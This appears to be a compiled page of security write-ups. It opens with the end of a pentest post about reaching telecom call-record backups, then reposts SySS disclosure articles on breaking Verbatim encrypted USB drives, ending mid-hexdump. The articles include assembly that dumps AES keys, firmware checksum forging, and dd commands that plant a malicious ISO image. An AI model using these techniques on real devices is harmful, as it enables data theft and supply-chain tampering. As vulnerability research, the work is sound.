Due to this, I was able to get to the CDR backups that were stored in XLS format for almost all the mobile subscribers. (Sorry but I had to redact a lot as these were really critical information)

From the screenshot, A Number is from where the call was originated (the caller) and B Number was the dialed number. The CDR record also included the IMSI & IMEI numbers, Call Start/End Date & Timestamp, Call duration, Call Types (Incoming calling or Outgoing), Service Type (the telecom service companies), Cell ID-A (The Cell Tower from where the call was originated) and Location-A (The location of the caller)

Once our team notified the client regarding our access to the CDR Backup servers, the client asked us to end our engagement there. I guess it was too much for them to take it 🤣

I hope you guys enjoyed it!

Promotion Time!

If you guys want to learn more about the techniques I used and the basic concepts behind it, you can read my books (co-authored with @himanshu_hax)

Hacking Some More Secure USB Flash Drives (Part II)

Hacking Some More Secure USB Flash Drives (Part II)

Original text by Matthias Deeg

In the second article of this series, SySS IT security expert Matthias Deeg presents security vulnerabilities found in another crypto USB flash drive with AES hardware encryption.

Introduction

In the second part of this blog series, the research results concerning the secure USB flash drive Verbatim Executive Fingerprint Secure SSD shown in the following Figures are presented.

Front view of the secure USB flash drive Verbatim Executive Fingerprint Secure

The Verbatim Executive Fingerprint Secure SSD is a USB drive with AES 256-bit hardware encryption and a built-in fingerprint sensor for unlocking the device with previously registered fingerprints.

The manufacturer describes the product as follows:

The AES 256-bit Hardware Encryption seamlessly encrypts all data on the drive in real-time. The drive is compliant with GDPR requirements as 100% of the drive is securely encrypted. The built-in fingerprint recognition system allows access for up to eight authorised users and one administrator who can access the device via a password. The SSD does not store passwords in the computer or system’s volatile memory making it far more secure than software encryption.

The used test methodology regarding this research project, the considered attack surface and attack scenarios, and the desired security properties expected in a secure USB flash drive were already described in the first part of this article series.

Hardware Analysis

When analyzing a hardware device like a secure USB flash drive, the first thing to do is taking a closer look at the hardware design. By opening the case of the Verbatim Executive Fingerprint Secure SSD, its printed circuit board (PCB) can be removed. The following figure shows the front side of the PCB and the used SSD with an M.2 form factor.

PCB front side of Verbatim Executive Fingerprint Secure SSD

Here, we can already see the first three main components of this device:

  1. NAND flash memory chips
  2. a memory controller (Maxio MAS0902A-B2C)
  3. a SPI flash memory chip (XT25F01D)

On the back side of the PCB, the following further three main components can be found:

  1. a USB-to-SATA bridge controller (INIC-3637EN)
  2. a fingerprint sensor controller (INIC-3782N)
  3. a fingerprint sensor
PCB back side of Verbatim Executive Fingerprint Secure SSD

The Maxio memory controller and the NAND flash memory chips are part of an SSD in M.2 form factor. This SSD can be read and written using another SSD enclosure supporting this form factor which was very useful for different security tests.

Encryption

Just like the Verbatim Keypad Secure covered in the first part of this article series, the Verbatim Executive Fingerprint Secure SSDcontains a SATA SSD with an M.2 form factor which can be used in another compatible SSD enclosure. Thus, analyzing the actually stored data of this secure USB flash drive was also rather easy.

By having a closer look at the encrypted data, obvious patters could be seen, as the following hexdump illustrates:

# hexdump -C /dev/sda
00000000  7c a1 eb 7d 4e 39 1e b1  9b c8 c6 86 7d f3 dd 70  ||..}N9......}..p|
*
000001b0  99 e8 74 12 35 1f 1b 3b  77 12 37 6b 82 36 87 cf  |..t.5..;w.7k.6..|
000001c0  fa bf 99 9e 98 f7 ba 96  ba c6 46 3a e5 bc 15 55  |..........F:...U|
000001d0  7c a1 eb 7d 4e 39 1e b1  9b c8 c6 86 7d f3 dd 70  ||..}N9......}..p|
*
000001f0  92 78 15 87 cd 83 76 30  56 dd 00 1e f2 b3 32 84  |.x....v0V.....2.|
00000200  7c a1 eb 7d 4e 39 1e b1  9b c8 c6 86 7d f3 dd 70  ||..}N9......}..p|
*
00100000  1e c0 fa 24 17 d9 4b 72  89 44 20 3b e4 56 99 32  |...$..Kr.D ;.V.2|
00100010  d8 65 93 7c 37 aa 8f 59  5e ec f1 e7 e6 9b de 9e  |.e.|7..Y^.......|
[...]

The 

*
 in this hexdump output means that the previous line (here 16 bytes of data) is repeated one or more times. The first column showing the address indicates how many consecutive lines are the same. For example, the first 16 bytes 
7c a1 eb 7d 4e 39 1e b1 9b c8 c6 86 7d f3 dd 70
 are repeated 432 (0x1b0) times starting at the address 
0x00000000
, and the same pattern of 16 bytes is repeated 32 times starting at the address 
0x000001d0
.

Seeing such repeating byte sequences in encrypted data is not a good sign, as we already know from part one of this series.

By writing known byte patterns to an unlocked device, it could be confirmed that the same 16 bytes of plaintext always result in the same 16 bytes of ciphertext. This looks like a block cipher encryption with 16 byte long blocks using Electronic Codebook (ECB)mode was used, for example AES-256-ECB.

For some data, the lack of the cryptographic property called diffusion, which this operation mode has, can leak sensitive information even in encrypted data. A famous example for illustrating this issue is a bitmap image of Tux, the Linux penguin, and its ECB encrypted data shown in the following Figure.

Image of Tux (left) and its ECB encrypted image data (right) illustrating ECB mode of operation on Wikipedia

This found security issue was reported in the course of our responsible disclosure program via the security advisory SYSS-2022-010 and was assigned the CVE ID CVE-2022-28382.

Firmware Analysis

The SPI flash memory chip (XT25F01D) of the Verbatim Executive Fingerprint Secure SSD contains the firmware for the USB-to-SATA bridge controller Initio INIC-3637EN. The content of this SPI flash memory chip could be extracted using the universal programmer XGecu T56.

When analyzing the firmware, it could be found out that the firmware validation only consists of a simple CRC-16 check using XMODEM CRC-16. Thus, an attacker is able to store malicious firmware code for the INIC-3637EN with a correct checksum on the used SPI flash memory chip.

For updating modified firmware images, a simple Python tool was developed that fixes the required CRC-16, as the following output exemplarily shows.

$ python update-firmaware.py firmware_hacked.bin
Verbatim Executive Fingerprint Secure SSD Firmware Updater v0.1 - Matthias Deeg, SySS GmbH (c) 2022
[*] Computed CRC-16 (0x7087) does not match stored CRC-16 (0x48EE).
[*] Successfully updated firmware file

Thus, an attacker is able to store malicious firmware code for the INIC-3637EN with a correct checksum on the used SPI flash memory chip (XT25F01D), which then gets successfully executed by the USB-to-SATA bridge controller. For instance, this security vulnerability could be exploited in a so-called supply chain attack when the device is still on its way to its legitimate user.

An attacker with temporary physical access during the supply could program a modified firmware on the Verbatim Executive Fingerprint Secure SSD, which always uses an attacker-controlled AES key for the data encryption, for example. If the attacker later on gains access to the used USB drive, he can simply decrypt all contained user data.

This found security issue concerning the insufficient firmware validation, which allows an attacker to store malicious firmware code for the USB-to-SATA bridge controller on the USB drive, was reported in the course of our responsible disclosure program via the security advisory SYSS-2022-011 and was assigned the CVE ID CVE-2022-28383.

Protocol Analysis

The hardware design of the Verbatim Executive Fingerprint Secure SSD allowed for sniffing the serial communication between the fingerprint sensor controller (INIC-3782N) and the USB-to-SATA bridge controller (INIC-3637EN).

The following Figure exemplarily shows exchanged data when unlocking the device with a correct fingerprint. The actual communication is bidirectional and different data packets are exchanged during an unlocking process.

Sniffed serial communication when unlocking with a correct fingerprint shown in logic analyzer

In the course of this research project, no further time was spent to analyze the used proprietary protocol between the fingerprint sensor controller and the USB-to-SATA bridge controller, as a simpler way could be found to attack this device, which is described in the next section.

User Authentication

The Verbatim Executive Fingerprint Secure SSD supports the following two user authentication methods:

  1. Biometric authentication via fingerprint
  2. Password-based authentication

For the biometric authentication, a fingerprint sensor and a specific microcontroller (INIC-3782N) are used. Unfortunately, no public information about the INIC-3782N could be found, like data sheets or programming manuals.

For the registration of fingerprints, a client software (available for Windows or macOS) is used. The client software also supports a password-based authentication for accessing the administrative features and unlocking the secure disk partition containing the user data. The following Figure shows the login dialog of the provided client software for Windows.

Password-based authentication for administrator (
VerbatimSecure.exe
)

Software Analysis

The client software for Windows and macOS is provided on an emulated CD-ROM drive of the Verbatim Executive Fingerprint Secure SSD, as the following Figure exemplarily illustrates.

Emulated CD-ROM drive with client software

During this research project, only the Windows software in form of the executable 

VerbatimSecure.exe
 was analyzed. This Windows client software communicates with the USB storage device via 
IOCTL_SCSI_PASS_THROUGH
 (
0x4D004
) commands using the Windows API function 
DeviceIoControl
. However, simply analyzing the USB communication by setting a breakpoint on this API function in a software debugger like [x64dbg][x64db] was not possible, because the USB communication is AES-encrypted as the following Figure exemplarily illustrates.

Encrypted USB communication via 
DeviceIoControl

Fortunately, the Windows client software is very analysis-friendly, as meaningful symbol names are present in the executable, for example concerning the used AES encryption for protecting the USB communication.

The following Figure shows the AES (Rijndael) functions found in the Windows executable 

VerbatimSecure.exe
.

AES functions of the Windows client software

Here, especially the two functions named 

CRijndael::Encrypt
 and 
CRijndael::Decrypt
 were of greater interest.

Furthermore, runtime analyses of the Windows client software using a software debugger like x64dbg could be performed without any issues. And in doing so, it was possible to analyze the AES-encrypted USB communication in cleartext, as the following Figure with a decrypted response from the USB flash drive illustrates.

Decrypted USB communication (response from device)

For securing the USB communication, AES with a hard-coded cryptographic key is used.

When analyzing the USB communication between the client software and the USB storage device, a very interesting and concerning observation was made. That is, before the login dialog with the password-based authentication is shown, there was already some USB device communication with sensitive data. And this sensitive data was nothing less than the currently set password for the administrative access.

The following Figure shows the corresponding decrypted USB device response with the current administrator password 

S3cretP4ssw0rd
 in this example.

Decrypted USB device response containing the current administrator password

Thus, by accessing the decrypted USB communication of this specific IOCTL command, for instance using a software debugger as illustrated in the previous Figure, an attacker can instantly retrieve the correct plaintext password and thus unlock the device in order to gain unauthorized access to its stored user data.

In order to simplify the password retrieval process, a software tool named 

Verbatim Fingerprint Secure Password Retriever
 was developed that can extract the currently set password of a Verbatim Executive Fingerprint Secure SSD. The following Figure exemplarily shows the successful retrieval of the password 
S3cretP4ssw0rd
 that was previously set on this test device.

Successful attacking using the developed Verbatim Fingerprint Secure Password Retriever

This found security vulnerability was reported in the course of our responsible disclosure program via the security advisory SYSS-2022-009 with the assigned CVE ID CVE-2022-28387.

You can also find a demonstration of this attack in our SySS PoC video Hacking Yet Another Secure USB Flash Drive.

Data Authenticity

As described previously, the client software for administrative purposes is provided on an emulated CD-ROM drive. As my analysis showed, the content of this emulated CD-ROM drive is stored as an ISO-9660 image in the hidden sectors of the USB drive, that can only be accessed using special IOCTL commands, or when installing the drive in an external enclosure.

The following 

fdisk
 output shows disk information using the Verbatim enclosure with a total of 1000179711 sectors.

# fdisk -l /dev/sda
Disk /dev/sda: 476.92 GiB, 512092012032 bytes, 1000179711 sectors
Disk model: Portable Drive
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xbfc4b04e

Device     Boot Start        End    Sectors   Size Id Type
/dev/sda1        2048 1000171517 1000169470 476.9G  c W95 FAT32 (LBA)

The next 

fdisk
 output shows the information for the same disk when using an external enclosure where a total of 1000215216 sectors is available.

# fdisk -l /dev/sda
Disk /dev/sda: 476.94 GiB, 512110190592 bytes, 1000215216 sectors
Disk model: RTL9210B NVME
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

And in those 35505 hidden sectors concerning the tested 512 GB version of the Verbatim Executive Fingerprint Secure SSD, the ISO-9660 image with the content of the emulated CD-ROM drive is stored, as the following output illustrates.

# dd if=/dev/sda bs=512 skip=1000179711 of=cdrom.iso
35505+0 records in
35505+0 records out
18178560 bytes (18 MB, 17 MiB) copied, 0.269529 s, 67.4 MB/s

# file cdrom.iso
cdrom.iso: ISO 9660 CD-ROM filesystem data 'VERBATIMSECURE'

By manipulating this ISO-9660 image or replacing it with another one, an attacker is able to store malicious software on the emulated CD-ROM drive. This malicious software may get executed by an unsuspecting victim when using the device at a later point in time.

The following Figure exemplarily shows what an emulated CD-ROM drive manipulated by an attacker containing malware my look like.

Emulated CD-ROM drive with attacker-controlled content

The following output exemplarily shows how a hacked ISO-9660 was generated for testing this attack vector.

# mkisofs -o hacked.iso -J -R -V "VerbatimSecure" ./content

# dd if=hacked.iso of=/dev/sda bs=512 seek=1000179711
25980+0 records in
25980+0 records out
13301760 bytes (13 MB, 13 MiB) copied, 1.3561 s, 9.8 MB/s

As a thought experiment, this security issue concerning the data authenticity of the ISO-9660 image for the emulated CD-ROM partition could be exploited in an attack scenario one could call The Poor Hacker’s Not Targeted Supply Chain Attack which consists of the following steps:

  1. Buy vulnerable devices in online shops
  2. Modify bought devices by adding malware
  3. Return modified devices to vendors
  4. Hope that returned devices are resold and not destroyed
  5. Wait for potential victims to buy and use the modified devices
  6. Profit?!

This found security issue was reported in the course of our responsible disclosure program via the security advisory SYSS-2022-013 with the assigned CVE ID CVE-2022-28385.

Summary

In this article, the research results leading to four different security vulnerabilities concerning the Verbatim Executive Fingerprint Secure SSD listed in the following Table were presented.

ProductVulnerability TypeSySS IDCVE ID
Verbatim Executive Fingerprint Secure SSDUse of a Cryptographic Primitive with a Risky Implementation (CWE-1240)SYSS-2022-009CVE-2022-28387
Verbatim Executive Fingerprint Secure SSDUse of a Cryptographic Primitive with a Risky Implementation (CWE-1240)SYSS-2022-010CVE-2022-28382
Verbatim Executive Fingerprint Secure SSDMissing Immutable Root of Trust in Hardware (CWE-1326)SYSS-2022-011CVE-2022-28383
Verbatim Executive Fingerprint Secure SSDInsufficient Verification of Data Authenticity (CWE-345)SYSS-2022-013CVE-2022-28385

Again, these results show, that new portable storage devices with old security issues are still produced and sold today.

Hacking Some More Secure USB Flash Drives (Part I)

Hacking Some More Secure USB Flash Drives (Part I)

Original text by Matthias Deeg

During a research project in the beginning of 2022, SySS IT security expert Matthias Deeg found several security vulnerabilities in different tested USB flash drives with AES hardware encryption.

Introduction

Encrypting sensitive data at rest has always been a good idea, especially when storing it on small, portable devices like external hard drives or USB flash drives. Because in case of loss or theft of such a storage device, you want to be quite sure that unauthorized access to your confidential data is not possible. Unfortunately, even in 2022, “secure” portable storage devices with 256-bit AES hardware encryption and sometimes also biometric technology are sold that are actually not secure when taking a closer look.

In a series of blog articles (this one being the first one), I want to illustrate how a customer request led to further research resulting in several cryptographically broken “secure” portable storage devices. This research continues the long story of insecure portable storage devices with hardware AES encryption that goes back many years.

This first part is about my research results concerning the secure USB flash drive Verbatim Keypad Secure shown in the following Figure.

Front view of the secure USB flash drive Verbatim Keypad Secure

The Verbatim Keypad Secure is a USB drive with AES 256-bit hardware encryption and a built-in keypad for passcode entry.

The manufacturer describes the product as follows:

The AES 256-bit Hardware Encryption seamlessly encrypts all data on the drive in real-time with a built-in keypad for passcode input. The USB Drive does not store passwords in the computer or system’s volatile memory making it far more secure than software encryption. Also, if it falls into the wrong hands, the device will lock and require re-formatting after 20 failed passcode attempts.” [1]

Test Methodology

For this research project concerning different secure USB flash drives, the following proven test methodology for IT products was used:

  1. Hardware analysis: Open hardware, identify chips, read manuals, find test points, use logic analyzers and/or JTAG debuggers
  2. Firmware analysis: Try to get access to device firmware (memory dump, download, etc.), analyze firmware for security issues
  3. Software analysis: Static code analysis and runtime analysis of device client software

Depending on the actual product, not all kinds of analysis can be applied. For instance, if there is no software component, it cannot be analyzed, which is the case for the Verbatim Keypad Secure.

Attack Surface and Attack Scenarios

Attacks against the tested secure portable USB storage devices during this research project require physical access to the hardware. In general, attacks are possible at different points in time concerning the storage device life-cycle:

  1. Before the legitimate user has used the device (supply chain attack)
  2. After the legitimate user has used the device
    • Lost device or stolen device
    • Temporary physical access to the device without the legitimate user knowing

Desired Security Properties of Secure USB Flash Drives

When performing security tests, one should have a specification or at least some expectations to test against, in order distinguish whether achieved test results may pose an actual security risk or not.

Regarding the product type of secure USB flash drives, the following list describes desired security properties I would expect:

  • All user data is securely encrypted (impossible to infer information about the plaintext by looking at the ciphertext)
  • Only authorized users have access to the stored data
  • The user authentication process cannot be bypassed
  • User authentication attempts are limited (online brute-force attacks)
    • Reset device after X failed consecutive authentication attempts
  • Device integrity is protected by secure cryptographic means
  • Exhaustive offline brute-force attacks are too expensive™
    • Very large search space (e.g. 2256 possible cryptographic keys)
    • Required data not easily accessible to the attacker (cannot be extracted without some fancy, expensive equipment and corresponding know-how)

Hardware Analysis

When analyzing a hardware device like a secure USB flash drive, the first thing to do is taking a closer look at the hardware design. By opening the case of the Verbatim Keypad Secure, access to its printed circuit board (PCB) is given as shown in the following Figure.

PCB front side of Verbatim Keypad Secure

Here, we can already see the first three main components of this device:

  1. NAND flash memory chips (TS1256G181)
  2. a memory controller (MARVELL-88NV1120)
  3. a USB-to-SATA bridge controller (INIC-3637EN)

When we remove the main PCB from the case and have a look at its back side, we can find two more main components:

  1. a SPI flash memory chip (XT25F01D)
  2. a keypad controller (unknown chip, marked SW611 2121)

And of course, we have several push buttons making up our keypad.

PCB back side of Verbatim Keypad Secure

The Marvell memory controller and the NAND flash memory chips are part of an SSD in M.2 form factor shown in the following Figure.

SSD with M.2 form factor (front and back side)

This SSD can be read and written using another SSD enclosure supporting this form factor which was very useful for different security tests described in later sections.

Device Lock & Reset

Before having a closer look at the different identified main components of this secure USB flash drive, some simple tests concerning advertised security features were performed, for instance regarding the device lock and reset feature described in the user manual shown in the following Figure.

Warning from Verbatim Keypad Secure User Manual concerning device lock

The idea behind this security feature is to limit the amount of passcode guesses to a maximum of 20 when performing a brute-force attack. If this threshold is reached after 20 failed unlock attempts, the USB drive should be newly initialized and all previously stored data should not be accessible anymore. However, when performing manual passcode brute-force attacks during the research project, it was not possible to lock the available test devices after 20 consecutively failed unlock attempts. Thus, the security feature for locking and requiring to reformat the USB drive simply does not work as specified. Therefore, an attacker with physical access to such a Verbatim Keypad Secure USB flash drive can try more passcodes in order to unlock the device as proclaimed by Verbatim. During the performed manual brute-force attacks, locking the device so that reformatting is required was not possible at all.

This found security issue was reported in the course of our responsible disclosure program via the security advisory SYSS-2022-004 and was assigned the CVE ID CVE-2022-28386.

Encryption

As the Verbatim Keypad Secure contains a SATA SSD with an M.2 form factor which can be used in another compatible SSD enclosure, analyzing the actually stored data of this secure USB flash drive was rather easy.

And by having a closer look at the encrypted data, obvious patters could be seen, as the following hexdump illustrates:

# hexdump -C /dev/sda
00000000  c4 1d 46 58 05 68 1d 9a  32 2d 29 04 f4 20 e8 4d  |..FX.h..2-).. .M|
*
000001b0  9f 73 b0 a1 81 34 ef bd  a4 b3 15 2c 86 17 cb 69  |.s...4.....,...i|
000001c0  eb d0 9d 9a 4e d8 04 a6  92 ba 3f f4 0c 88 a5 1d  |....N.....?.....|
000001d0  c4 1d 46 58 05 68 1d 9a  32 2d 29 04 f4 20 e8 4d  |..FX.h..2-).. .M|
*
000001f0  e0 01 66 72 af f2 be 65  5f 69 12 88 b8 a1 0b 9d  |..fr...e_i......|
00000200  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00100000  73 b2 f8 fb af cf ed 57  47 db b8 c7 ad 9c 91 07  |s......WG.......|
00100010  7a 93 c9 d9 60 7e 2c e4  97 6c 7b f8 ee 4f 87 2c  |z...`~,..l{..O.,|
00100020  19 72 83 d1 6d 0b ca bb  68 f8 ec e3 fc c0 12 b7  |.r..m...h.......|
[...]

The 

*
 in this hexdump output means that the previous line (here 16 bytes of data) is repeated one or more times. The first column showing the address indicates how many consecutive lines are the same. For example, the first 16 bytes 
c4 1d 46 58 05 68 1d 9a 32 2d 29 04 f4 20 e8 4d
 are repeated 432 (0x1b0) times starting at the address 
0x00000000
, and the same pattern of 16 bytes is repeated 32 times starting at the address 
0x000001d0
.

Seeing such repeating byte sequences in encrypted data is not a good sign.

By writing known byte patterns to an unlocked device, it could be confirmed that the same 16 bytes of plaintext always result in the same 16 bytes of ciphertext. This looks like a block cipher encryption with 16 byte long blocks using Electronic Codebook (ECB)mode was used, for example AES-256-ECB.

For same data, the lack of the cryptographic property called diffusion, which this operation mode has, can leak sensitive information even in encrypted data. A famous example for illustrating this issue is a bitmap image of Tux, the Linux penguin, and its ECB encrypted data shown in the following Figure.

Image of Tux (left) and its ECB encrypted image data (right) illustrating ECB mode of operation on Wikipedia

This found security issue was reported in the course of our responsible disclosure program via the security advisory SYSS-2022-002 and was assigned the CVE ID CVE-2022-28382.

Firmware Analysis

The next step after analyzing the hardware and performing some simple tests concerning the passcode-based authentication was analyzing the device firmware.

Fortunately, the chosen hardware design with an Initio INIC-3637EN USB-to-SATA bridge controller and a separate SPI flash memory chip (XT25F01D) containing this controller’s firmware made the acquisition of the used firmware quite easy, as the content of the SPI flash memory chip could simply be dumped using a universal programmer like an XGecu T56.

Unfortunately, for the used INIC-3637EN there was no datasheet publicly available. But there are research publications with useful information about other, similar Chips by Initio like the INIC-3607. Especially the publication Lost your “secure” HDD PIN? We can Help!by Julien Lenoir and Raphaël Rigo was of great help. And as the INIC-3637EN uses the ARCompact instruction set, also the publication Analyzing ARCompact Firmware with Ghidra by Nicolas Iooss and his implemented Ghidra support were of great use for analyzing the firmware of the Verbatim Keypad Secure.

The following Figure exemplarily illustrates a disassembled and decompiled function of the dumped Verbatim Keypad Secure firmware within Ghidra.

Example of analyzing the Verbatim Keypad Secure firmware with Ghidra

When analyzing the firmware, it could be found out that the firmware validation only consists of a simple CRC-16 check using XMODEM CRC-16. Thus, an attacker is able to store malicious firmware code for the INIC-3637EN with a correct checksum on the used SPI flash memory chip. The following Figure shows the CRC-16 at the end of the firmware dump.

Content of the SPI flash memory chip with a CRC-16 at the end shown in 010 Editor

For updating modified firmware images, a simple Python tool was developed that fixes the required CRC-16, as the following output exemplarily shows.

$ python update-firmaware.py firmware_hacked.bin
Verbatim Secure Keypad Firmware Updater v0.1 - Matthias Deeg, SySS GmbH (c) 2022
[*] Computed CRC-16 (0x03F5) does not match stored CRC-16 (0x8B17).
[*] Successfully updated firmware file

Being able to modify the device firmware was very useful for further analyses of the INIC-3637EN, and the configuration and operation mode of its hardware AES engine. By writing some ARCompact assembler code and using the firmware’s SPI functionality, interesting data memory of the INIC-3637EN could be read or modified during the runtime of the Verbatim Keypad Secure.

This found security issue concerning the insufficient firmware validation, which allows an attacker to store malicious firmware code for the USB-to-SATA bridge controller on the USB drive, was reported in the course of our responsible disclosure program via the security advisory SYSS-2022-003 and was assigned the CVE ID CVE-2022-28383.

The following ARCompact assembler code demonstrates how the content of identified AES key buffers (for instance at the memory address 

0x40046904
) could be extracted via SPI communication.

.global __start

.text

__start:
    mov_s   r13, 0x4000010c       ; read AES mode
    ldb_s   r0, [r13]
    bl      send_spi_byte

    mov_s   r12, 0                ; index
    ; mov_s   r13, 0x400001d0       ; AES key buffer address
    mov_s   r13, 0x40056904       ; AES key buffer address
    mov     r14, 32               ; loop count

send_data:
    ldb.ab  r0, [r13, 1]          ; load next byte
    add     r12, r12, 1
    bl      send_spi_byte

    sub     r14, r14, 1
    cmp_s   r14, 0
    bne     send_data
    b       continue
    
.align 4
send_spi_byte:
    mov_s   r3, 0x1
    mov_s   r2, 0x400503e0

    stb.di  r3, [r2, 0xf1]
    mov_s   r1, 0xee
    stb.di  r1, [r2, 0xe3]
    stb.di  r3, [r2, 0xe2]
    stb.di  r0, [r2, 0xe1]
send_spi_wait:
    ldb.di  r0,[r2, 0xf1]
    bbit0   r0, 0x0, send_spi_wait
    stb.di  r3,[r2, 0xf1]
    j_s     [blink]

continue:

How bytes can be sent via the SPI functionality of the INIC-3637EN was simply copied from another part of the analyzed firmware and reused in a slightly modified form.

Developed ARCompact assembly code for debugging purposes could be assembled using a corresponding GCC toolchain. The generated machine code could then be copied and pasted from the resulting ELF executable to a suitable location within the firmware image.

The following output shows an example `Makefile used during this research project.

PROJECT = debug
ASM = ./arc-snps-elf-as
ASMFLAGS = -mcpu=arc600
LD = ./arc-snps-elf-ld
LDFLAGS = --oformat=binary

$(PROJECT): $(PROJECT).o
    $(LD) $(LDFLAGS) $(PROJECT).elf -o $(PROJECT).o

$(PROJECT).o: $(PROJECT).asm
    $(ASM) $(ASMFLAGS) debug.asm -o $(PROJECT).elf

clean:
    rm $(PROJECT).elf $(PROJECT).o

During the firmware analysis, it was also possible to find interesting artifacts contained within the firmware code that are also part of other device firmware, for example

  1. Pi byte sequence (weird AES keys for other similar storage devices, e.g. ZALMAN ZM-VE500 as described in the publication Lost your “secure” HDD PIN? We can Help!)
  2. Magic signature ” INI” (
    0x494e4920
    )

The presence of different instances of the Pi byte sequence within the analyzed firmware is shown in the following Figure. Concerning other devices, this byte sequences were used to initialize AES key buffers. However, in case of the Verbatim Keypad Secure they were not used.

Pi byte sequence used as AES keys in other device firmware

The following Figure shows a decompiled version of the identified unlock function with references to the magic signature ” INI”(

0x494e4920
).

Magic signature 
0x494e4920
 within the unlock function

As a firmware analysis solely based on reverse code engineering can be quite time quite consuming for understanding the inner workings of a device, it is oftentimes a good idea to combine such a dead approach with some kind of live approach for analysis purposes. During this research project, fortunately the ability to analyze the device firmware could be combined with a protocol analysis described in the next section.

Protocol Analysis

The hardware design of the Verbatim Keypad Secure allowed for sniffing the SPI communication between the keypad controller and the USB-to-SATA bridge controller (INIC-3637EN). Here, further interesting patterns could be seen, as the following Figure showing sniffed SPI communication of an unlock command illustrates.

Sniffed SPI communication for unlock PIN pattern shown in logic analyzer
  1. 0xE1
    Initialize device
  2. 0xE2
    Unlock device
  3. 0xE3
    Lock device
  4. 0xE4
    : Unknown
  5. 0xE5
    Change passcode
  6. 0xE6
    : Unknown

The identified message format for those commands is as follows:

Analyzed SPI message format

The used checksum of the SPI messages is a CRC-16 with XMODEM configuration. When a passcode is used within a command, for instance in case of the unlock command, all entered passcodes always result in a 32 byte long payload, no matter how long the actual passcode was. Furthermore, the last 16 bytes of such a payload always only consists of 

0xFF
 bytes, and within the first 16 bytes obvious patterns can be recognized.

For example, when a passcode consisting of twelve ones (i.e. 

111111111111
) was used, the payload shown in the following Figure was sent.

Obvious SPI payload patterns

The sequence of numbers 

1111
 always resulted in the byte sequence 
0A C9 1F 2F
, and by testing other sequences of numbers other resulting byte sequences could be observed. Thus, some kind of hashing or mapping is used for the user input in form of a numerical passcode. Unfortunately, the keypad controller chip with this algorithm was a black box during this research project.

So there were the following two ideas for a black box analysis:

  1. Find out the used hashing algorithm by collecting more hash samples for 4-digit inputs and analyzing them
  2. Hardware brute-force attack for generating all possible hashes for 4-digit inputs in order to create a lookup table

The following Table shows some examples of 4-digit inputs and the resulting 32-bit hashes.

4-digit input32-bit hash
00004636B9C9
11110AC91F2F
22225EC8BD1E
3333624E6000
4444B991063F
55550A05D514
66667E657A68
7777B1C9C3BA
88887323CC76
9999523DA5F5
1234E097BCF8
5678F540AEF4
no input956669AD

The first approach, manually collecting more hash samples and trying out different hash algorithms, was not successful after investing some time. Thus, the second approach using a hardware brute-force attack for collecting all possible hashes was followed. However, there were other some problems. Those problems concern how the keypad works and that it was not that simple to automatically generate key presses as initially assumed.

The following Figure shows the observed encoding of all possible keys of the keypad in a logic analyzer.

Encoding of all possible keys of the keypad

The corresponding pinout of the keypad controller according to my analysis is shown in the following Figure.

Keypad controller pinout according to our analysis

For automatically collecting all possible hashes of 4-digit inputs, the keyboard controller was desoldered from the PCB and put on a breakout board. This breakout board was then put on a breadboard together with a Teensy USB Development Board. Then, a keypad brute-forcer for the Teensy was developed for simulating keypresses. This worked for all keys but the unlock key. Thus, the desired SPI communication between the keypad controller and the USB-to-SATA bridge controller could not be triggered via a simulated unlockkeypress.

Pin 7 of the keyboard controller also seems to get triggered when the unlock key is pressed, and the USB-to-SATA bridge controller initiates SPI communication with the keypad controller shortly afterwards. After some failed attempts to replicate this behavior I switched again to the first approach for the black box analysis in an act of frustration.

Hash Function Analysis

Thus, I again tried to find some more information in the World Wide Web about this unknown hash or mapping algorithm. And luckily, this time I actually found something using the hash 

4636B9C9
 for the 4-digit input of 
0000
, as the following Figure shows.

Search results for the search term 
4636B9C9
 in DuckDuckGo

And this Reddit post in dailyprogrammer_ideas titled [Intermediate/Hard] Integer hash function interpreter had the solution I was looking for, as shown in the following Figure.

Reddit post with the integer hash algorithm hash32shift2002

The unknown hash algorithm is an integer hash function called hash32shift2002 in this article, and this integer hash function was obviously created by Thomas Wang and a C implementation looks as follows:

uint32_t hash32shift2002(uint32_t hash) {
    hash += ~(hash << 15);
    hash ^=  (hash >> 10);
    hash +=  (hash <<  3);
    hash ^=  (hash >>  6);
    hash += ~(hash << 11);
    hash ^=  (hash >> 16);
    return hash;
}

Now, the last missing puzzle piece was how and where user authentication data was stored and used.

User Authentication

The Verbatim Keypad Secure USB flash drive uses a passcode-based user authentication for unlocking the storage device containing the user data. So open questions were how this passcode comparison is actually done, and whether it was vulnerable to some kind of attack.

Due to previous research of similar devices, an educated guess was that information used for the authentication process is stored on the SSD. This could be verified by setting different passcodes and analyzing changes concerning the SSD content, where it could be found out that a special block (number 125042696 of the used 64 GB test devices) was used for storing authentication information whose content consistently changed with the set passcode. Furthermore, the firmware analysis showed that the first 112 bytes (0x70) of this special block are used when unlocking the device. And when the AES engine of the USB-to-SATA bridge controller INIC-3637EN is configured correctly concerning the operation mode and the cryptographic key, the first four bytes of the decrypted special block have to match the magic signature ” INI” (

0x494e4920
) mentioned in previous sections.

The following output exemplarily shows the encrypted content of this special block of the SSD.

# dd if=/dev/sda bs=512 skip=125042696 count=1 of=ciphertext_block.bin
1+0 records in
1+0 records out
512 bytes copied, 0.408977 s, 1.3 kB/s

# hexdump -C ciphertext_block.bin
00000000  c3 f7 d5 4d df 70 28 c1  e3 7e 92 08 a8 57 3e d8  |...M.p(..~...W>.|
00000010  f1 5c 3d 3c 71 22 44 c3  97 19 14 fd e6 3d 76 0b  |.\=<q"D......=v.|
00000020  63 f6 2a e3 72 8c dd 30  ae 67 fd cf 32 0b bf 3f  |c.*.r..0.g..2..?|
00000030  da 95 bc bb cc 9f f9 49  5e f7 4c 77 df 21 5c f4  |.......I^.Lw.!\.|
00000040  c3 35 ee c0 ed 9e bc 88  56 bd a5 53 4c 34 6e 2e  |.5......V..SL4n.|
00000050  61 06 49 08 9a 16 20 b7  cb c6 f8 f5 dd 6d 97 e6  |a.I... ......m..|
00000060  3c e7 1d 8e f8 e9 c6 07  5d fa 1a 8e 67 59 61 d1  |<.......]...gYa.|
